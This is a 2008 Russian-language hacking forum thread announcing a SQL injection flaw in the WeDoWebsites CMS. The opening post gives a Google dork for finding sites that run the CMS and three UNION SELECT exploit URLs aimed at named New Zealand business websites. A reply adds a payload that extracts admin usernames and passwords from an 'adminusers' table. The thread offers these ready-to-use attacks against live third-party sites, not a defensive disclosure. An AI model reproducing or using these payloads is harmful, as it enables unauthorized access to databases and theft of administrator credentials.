WeDoWebsites CMS Remote SQL Injection Vulnerability

Discussion in 'Веб-уязвимости' started by Ded MustD!e, 4 Jan 2008.

  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    *******************WeDoWebsites Content Management System*******************

    AUTHOR: Ded MustD!e
    GOOGLE DORK: "Powered by a WeDoWebsites Content Management System"
    LINK: http://www.wedowebsites.co.nz/
    EXPLOIT: http://site.com/xxxxx.php?pid=[SQL-INJ]
    DETAILS: колонок 6, а вот таблицу с данными админа я подобрать так и не смог, хотя префикс вроде не используется; админка: http://site.com/admin/
    EXAMPLES:

    Code:
    http://www.whiteelephant.co.nz/abeltasmanbackpackers.php?pid=-1+union+select+1,2,3,4,conca   t_ws(0x3a,user(),version(),database()),6/*
    Code:
    http://www.vistadesign.co.nz/landscapedesigners.php?pid=-1+union+select+1,2,concat_ws(0x3a,   user(),version(),database()),4,5,6/*
    Code:
    http://www.villaonthebay.co.nz/holidayhomegallery.php?pid=-1+union+select+1,2,3,4,concat_ws(   0x3a,user(),version(),database()),6/*
    P.S. А вообще в гугле 5 страниц с примерами ;). Если кто-нибудь подберет таблицу, напишите сюда или мне в ПМ, буду благодарен.

    ***************************************************************************
     
    1 person likes this.
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    у меня выводится 11 полей =)
    кмс платная что ли? в чем проблема узнать, какие там таблицы?
     
  3. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    по-видимому да, я так и не нашел, где слить исходники
     
  4. Maxyks

    Maxyks Banned

    Joined:
    8 Sep 2007
    Messages:
    174
    Likes Received:
    288
    Reputations:
    20
    Code:
    -1+union+select+1,2,3,4,concat_ws(0x3a,usr,pwd),6+from+[COLOR=YellowGreen]adminusers[/COLOR]+limit+0,1/*
     
    7 people like this.